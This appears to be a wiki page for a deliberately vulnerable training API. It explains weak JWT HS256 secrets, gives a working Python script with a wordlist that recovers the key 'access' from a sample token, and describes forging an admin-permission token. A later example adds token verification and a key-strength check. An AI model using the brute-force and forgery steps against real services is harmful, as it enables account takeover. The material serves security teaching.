
JWT Secret Key Brute Force

Sam Sanoop edited this page Dec 27, 2020 · 2 revisions

Introduction

JSON Web Token is a compact mechanism for transferring claims between two parties. The claims are represented as a JSON object and can be signed, to protect the integrity of the underlying message with a Message Authentication Code (MAC), and/or encrypted. The format is governed by RFC 7519. A JSON Web Token (JWT) consists of three parts: an encoded Header, an encoded Payload and the Signature. If a weak key is used to compute the signature, the key can be recovered by brute force.

Details

A JWT issued by the API can be taken from the Authorization header:

Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyIjoidGVzdCIsInBlcm1pc3Npb25zIjpbInVzZXI6cmVhZCIsInVzZXI6d3JpdGUiXSwiaWF0IjoxNjA5MDc2MjA2LCJleHAiOjE2MDkyNDkwMDYsImlzcyI6Imh0dHBzOi8vZ2l0aHViLmNvbS9zbm9vcHlzZWN1cml0eSJ9.gntpp9iRzVtYn1eZNwnvHPp-NaD15AgBDb4Ovti8r7w

A modified version of json_web_tokens.py can be used with the 10k-most-common.txt wordlist (saved as secret.txt, one candidate per line):

#!/usr/bin/env python3

import jwt
from termcolor import colored

print(colored("Script to brute-force JWT secret token", 'white'))
encoded = input("Enter encoded payload: ")

# Wordlist (10k-most-common.txt) saved as secret.txt, one candidate per line
with open('secret.txt') as secrets:
    for secret in secrets:
        secret = secret.rstrip()
        try:
            payload = jwt.decode(encoded, secret, algorithms=['HS256'])
            print(colored('Success! Token decoded with ....[' + secret + ']', 'green'))
            break
        # ExpiredSignatureError is a subclass of InvalidTokenError, so it must be
        # caught first; an expired token still means the signature (and key) matched
        except jwt.ExpiredSignatureError:
            print(colored('Token Expired but signature valid ....[' + secret + ']', 'yellow'))
            break
        except jwt.InvalidTokenError:
            print(colored('Invalid Token .... [' + secret + ']', 'red'))

By running the script, the secret key can be found.

💻️  📂️  🍣 master 📝 ×1🛤️  ×1via 🐍 v2.7.17   ✗ python3 brute-jwt.py 
Script to brute-force JWT secret token
Enter encoded payload: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyIjoidGVzdCIsInBlcm1pc3Npb25zIjpbInVzZXI6cmVhZCIsInVzZXI6d3JpdGUiXSwiaWF0IjoxNjA5MDc2MjA2LCJleHAiOjE2MDkyNDkwMDYsImlzcyI6Imh0dHBzOi8vZ2l0aHViLmNvbS9zbm9vcHlzZWN1cml0eSJ9.gntpp9iRzVtYn1eZNwnvHPp-NaD15AgBDb4Ovti8r7w
Invalid Token .... [password]
Invalid Token .... [123456]
Invalid Token .... [12345678]
Invalid Token .... [1234]
Invalid Token .... [qwerty]
Invalid Token .... [12345]
Invalid Token .... [dragon]
Invalid Token .... [pussy]
Invalid Token .... [baseball]
Invalid Token .... [football]
Invalid Token .... [letmein]
Invalid Token .... [monkey]
Invalid Token .... [696969]
Invalid Token .... [abc123]
Invalid Token .... [mustang]
Invalid Token .... [michael]
Invalid Token .... [shadow]
Invalid Token .... [master]
Invalid Token .... [jennifer]
Invalid Token .... [111111]
Invalid Token .... [2000]
Invalid Token .... [jordan]
Invalid Token .... [superman]
Invalid Token .... [harley]
Invalid Token .... [1234567]
Invalid Token .... [fuckme]
Invalid Token .... [hunter]
Invalid Token .... [fuckyou]
Invalid Token .... [trustno1]
Invalid Token .... [ranger]
Invalid Token .... [buster]
Invalid Token .... [thomas]
Invalid Token .... [tigger]
Invalid Token .... [robert]
Invalid Token .... [soccer]
Invalid Token .... [fuck]
Invalid Token .... [batman]
Invalid Token .... [test]
Invalid Token .... [pass]
Invalid Token .... [killer]
Invalid Token .... [hockey]
Invalid Token .... [george]
Invalid Token .... [charlie]
Invalid Token .... [andrew]
Invalid Token .... [michelle]
Invalid Token .... [love]
Invalid Token .... [sunshine]
Invalid Token .... [jessica]
Invalid Token .... [asshole]
Invalid Token .... [6969]
Invalid Token .... [pepper]
Invalid Token .... [daniel]
Success! Token decoded with ....[access]

https://www.jsonwebtoken.io/ can now be used to edit the token and add the "user:admin" permission.

[image: jwt2]

This token can now be used to access the admin area.

[image: jwt3]

[image: jwt4]
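The same token can be inspected and checked with nothing but the Python standard library. The following is an added example, not part of this wiki page or of the project's own code: it parses the three-part compact format described in the introduction, verifies an HS256 signature with a constant-time comparison while refusing any other alg value, and applies the RFC 7518 minimum key size (256 bits for HS256) that a secret such as access fails. PAGE_TOKEN is the token quoted above; the distinct-byte heuristic and the policy thresholds are this example's own choices, not anything from the page.

```python
import base64
import hashlib
import hmac
import json
import secrets

# Token quoted on this page. Header and claims are only base64url-encoded,
# so anyone holding the token can read them; only the signature needs the key.
PAGE_TOKEN = "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyIjoidGVzdCIsInBlcm1pc3Npb25zIjpbInVzZXI6cmVhZCIsInVzZXI6d3JpdGUiXSwiaWF0IjoxNjA5MDc2MjA2LCJleHAiOjE2MDkyNDkwMDYsImlzcyI6Imh0dHBzOi8vZ2l0aHViLmNvbS9zbm9vcHlzZWN1cml0eSJ9.gntpp9iRzVtYn1eZNwnvHPp-NaD15AgBDb4Ovti8r7w"

# RFC 7518 section 3.2: an HS256 key must be at least as long as the hash output (32 bytes).
MIN_HS256_KEY_BYTES = 32
# Heuristic chosen for this example: reject keys made of very few distinct byte values.
MIN_DISTINCT_BYTES = 8


def b64url_decode(part: str) -> bytes:
    # JWS uses base64url without '=' padding; restore it before decoding.
    return base64.urlsafe_b64decode(part + "=" * (-len(part) % 4))


def b64url_encode(raw: bytes) -> str:
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode("ascii")


def parse_jwt(token: str):
    """Split a compact JWS into (header, claims, signature) WITHOUT verifying it."""
    head_b64, body_b64, sig_b64 = token.split(".")
    return (json.loads(b64url_decode(head_b64)),
            json.loads(b64url_decode(body_b64)),
            b64url_decode(sig_b64))


def sign_hs256(head_b64: str, body_b64: str, key: bytes) -> bytes:
    # The JWS signing input is the ASCII of "<header>.<payload>".
    return hmac.new(key, f"{head_b64}.{body_b64}".encode("ascii"), hashlib.sha256).digest()


def verify_hs256(token: str, key: bytes) -> bool:
    """True only if the header says HS256 and the HMAC matches (constant-time compare)."""
    try:
        head_b64, body_b64, sig_b64 = token.split(".")
        header = json.loads(b64url_decode(head_b64))
        signature = b64url_decode(sig_b64)
    except ValueError:  # malformed structure, bad base64 or bad JSON
        return False
    if not isinstance(header, dict) or header.get("alg") != "HS256":
        return False  # never let the token choose the algorithm
    return hmac.compare_digest(sign_hs256(head_b64, body_b64, key), signature)


def make_hs256_token(claims: dict, key: bytes) -> str:
    """Issue a token the way the API would; used here to show round-trip verification."""
    head_b64 = b64url_encode(json.dumps({"alg": "HS256", "typ": "JWT"}, separators=(",", ":")).encode())
    body_b64 = b64url_encode(json.dumps(claims, separators=(",", ":")).encode())
    return f"{head_b64}.{body_b64}.{b64url_encode(sign_hs256(head_b64, body_b64, key))}"


def hs256_key_is_acceptable(key: bytes) -> bool:
    """Startup policy for the signing secret: RFC minimum length and not near-constant."""
    return len(key) >= MIN_HS256_KEY_BYTES and len(set(key)) >= MIN_DISTINCT_BYTES


def generate_hs256_key() -> bytes:
    """A key of the RFC minimum size from the OS CSPRNG; keep it in a secret store, not in code."""
    return secrets.token_bytes(MIN_HS256_KEY_BYTES)


if __name__ == "__main__":
    header, claims, sig = parse_jwt(PAGE_TOKEN)
    print("header:", header)
    print("claims:", claims)
    print("signature bytes:", len(sig))
    print("'access' passes key policy:", hs256_key_is_acceptable(b"access"))
    print("'access' verifies the page token:", verify_hs256(PAGE_TOKEN, b"access"))
    fresh = generate_hs256_key()
    print("generated key passes policy:", hs256_key_is_acceptable(fresh))
```

Running the file prints the header and claims of the page's token (including the user:read and user:write permissions and the exp claim) and shows that a six-byte secret fails the length rule before any wordlist is needed. The length check is necessary but not sufficient; a 32-byte key that is itself a dictionary phrase is still guessable, which is why the key should come from a CSPRNG as in generate_hs256_key and be rotated if it is ever found in source control.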
